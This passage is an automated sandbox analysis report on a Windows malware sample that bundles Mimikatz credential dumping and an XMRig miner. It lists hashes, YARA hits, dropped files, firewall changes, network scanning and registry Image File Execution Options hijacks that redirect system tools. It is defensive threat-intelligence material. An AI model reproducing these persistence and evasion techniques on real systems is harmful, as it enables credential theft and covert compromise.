Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
08-08-2024 06:49
Behavioral task
behavioral1
Sample
2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe
-
Size
8.3MB
-
MD5
8e369d75e4cf723bc3a054edacff4f34
-
SHA1
ebdb6d5f6472100d4b143c53f4a7caa61a95d32a
-
SHA256
aca70970a467c82593e548c27eb0f36218734e78158f5bb6a2acc5b2f79d4728
-
SHA512
738ab6744fb241710c772763d2aa9907cb73231e1be7e2017c52c7c3dd10083adc28d0f1e7f87c8fc92122d9eb6049d0d72eb584c92767736d01e10121eaad26
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4884 created 2108 4884 zitgyhd.exe 38 -
Contacts a large (27765) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/824-182-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-194-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-200-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-216-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-226-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-233-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-234-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-250-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-251-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-253-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-255-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig behavioral2/memory/824-256-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4360-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4360-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x0008000000023476-6.dat mimikatz behavioral2/memory/3200-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3928-138-0x00007FF601400000-0x00007FF6014EE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zitgyhd.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zitgyhd.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zitgyhd.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2836 netsh.exe 60 netsh.exe -
Executes dropped EXE 26 IoCs
pid Process 3200 zitgyhd.exe 4884 zitgyhd.exe 4396 wpcap.exe 4304 hcdfzcnbq.exe 3928 vfshost.exe 4892 bfbzkfznz.exe 4492 xohudmc.exe 208 umueiy.exe 824 znfeub.exe 2716 bfbzkfznz.exe 1200 bfbzkfznz.exe 1592 bfbzkfznz.exe 1736 bfbzkfznz.exe 964 bfbzkfznz.exe 3096 bfbzkfznz.exe 3280 bfbzkfznz.exe 3044 bfbzkfznz.exe 1864 bfbzkfznz.exe 3176 zitgyhd.exe 1692 bfbzkfznz.exe 4496 bfbzkfznz.exe 4680 bfbzkfznz.exe 2216 bfbzkfznz.exe 4040 bfbzkfznz.exe 4296 cngdgbzek.exe 232 zitgyhd.exe -
Loads dropped DLL 12 IoCs
pid Process 4396 wpcap.exe 4396 wpcap.exe 4396 wpcap.exe 4396 wpcap.exe 4396 wpcap.exe 4396 wpcap.exe 4396 wpcap.exe 4396 wpcap.exe 4396 wpcap.exe 4304 hcdfzcnbq.exe 4304 hcdfzcnbq.exe 4304 hcdfzcnbq.exe -
resource yara_rule behavioral2/files/0x00070000000234b9-134.dat upx behavioral2/memory/3928-135-0x00007FF601400000-0x00007FF6014EE000-memory.dmp upx behavioral2/memory/3928-138-0x00007FF601400000-0x00007FF6014EE000-memory.dmp upx behavioral2/files/0x00070000000234c4-141.dat upx behavioral2/memory/4892-142-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/4892-150-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/files/0x00070000000234c1-163.dat upx behavioral2/memory/824-165-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/2716-171-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/1200-175-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/1592-179-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/824-182-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/1736-184-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/964-188-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/3096-192-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/824-194-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/3280-197-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/824-200-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/3044-202-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/1864-206-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/1692-214-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/824-216-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/4496-219-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/4680-223-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/2216-227-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/824-226-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/2216-229-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/4040-232-0x00007FF77FB90000-0x00007FF77FBEB000-memory.dmp upx behavioral2/memory/824-233-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/824-234-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/824-250-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/824-251-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/824-253-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/824-255-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx behavioral2/memory/824-256-0x00007FF6BEDD0000-0x00007FF6BEEF0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 ifconfig.me 52 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2DEAA270F2A3ADDABB8505E3C5BD28E8 zitgyhd.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2DEAA270F2A3ADDABB8505E3C5BD28E8 zitgyhd.exe File opened for modification C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zitgyhd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zitgyhd.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\gfuncgqi\spoolsrv.xml zitgyhd.exe File opened for modification C:\Windows\gfuncgqi\docmicfg.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\uubgcusib\wpcap.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\spoolsrv.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\docmicfg.xml zitgyhd.exe File created C:\Windows\gfuncgqi\schoedcl.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\uubgcusib\scan.bat zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\coli-0.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\libxml2.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\vimpcsvc.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\upbdrjv\swrpwe.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\uubgcusib\ip.txt zitgyhd.exe File created C:\Windows\gzhzydtbv\uubgcusib\Packet.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\tucl-1.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\Shellcode.ini zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\tibe-2.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\trfo-2.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\Corporate\mimidrv.sys zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\svschost.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\AppCapture32.dll zitgyhd.exe File created C:\Windows\gfuncgqi\docmicfg.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\Corporate\mimilib.dll zitgyhd.exe File opened for modification C:\Windows\gzhzydtbv\uubgcusib\Result.txt cngdgbzek.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\posh-0.dll zitgyhd.exe File created C:\Windows\gfuncgqi\vimpcsvc.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\libeay32.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\spoolsrv.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\vimpcsvc.xml zitgyhd.exe File created C:\Windows\ime\zitgyhd.exe zitgyhd.exe File opened for modification C:\Windows\gfuncgqi\schoedcl.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\uubgcusib\wpcap.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\xdvl-0.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\vimpcsvc.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\schoedcl.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\spoolsrv.exe zitgyhd.exe File opened for modification C:\Windows\gfuncgqi\svschost.xml zitgyhd.exe File opened for modification C:\Windows\gzhzydtbv\Corporate\log.txt cmd.exe File created C:\Windows\gfuncgqi\zitgyhd.exe 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\zlib1.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\svschost.xml zitgyhd.exe File created C:\Windows\gfuncgqi\svschost.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\crli-0.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\ucl.dll zitgyhd.exe File opened for modification C:\Windows\gfuncgqi\zitgyhd.exe 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\docmicfg.xml zitgyhd.exe File created C:\Windows\gfuncgqi\spoolsrv.xml zitgyhd.exe File opened for modification C:\Windows\gfuncgqi\vimpcsvc.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\Corporate\vfshost.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\cnli-1.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\docmicfg.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\ssleay32.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\trch-1.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\svschost.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\schoedcl.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\schoedcl.xml zitgyhd.exe File created C:\Windows\gzhzydtbv\uubgcusib\hcdfzcnbq.exe zitgyhd.exe File opened for modification C:\Windows\gzhzydtbv\uubgcusib\Packet.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\AppCapture64.dll zitgyhd.exe File created C:\Windows\gzhzydtbv\uubgcusib\cngdgbzek.exe zitgyhd.exe File created C:\Windows\gzhzydtbv\UnattendGC\specials\exma-1.dll zitgyhd.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3552 sc.exe 4628 sc.exe 1412 sc.exe 3784 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language umueiy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cngdgbzek.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hcdfzcnbq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key 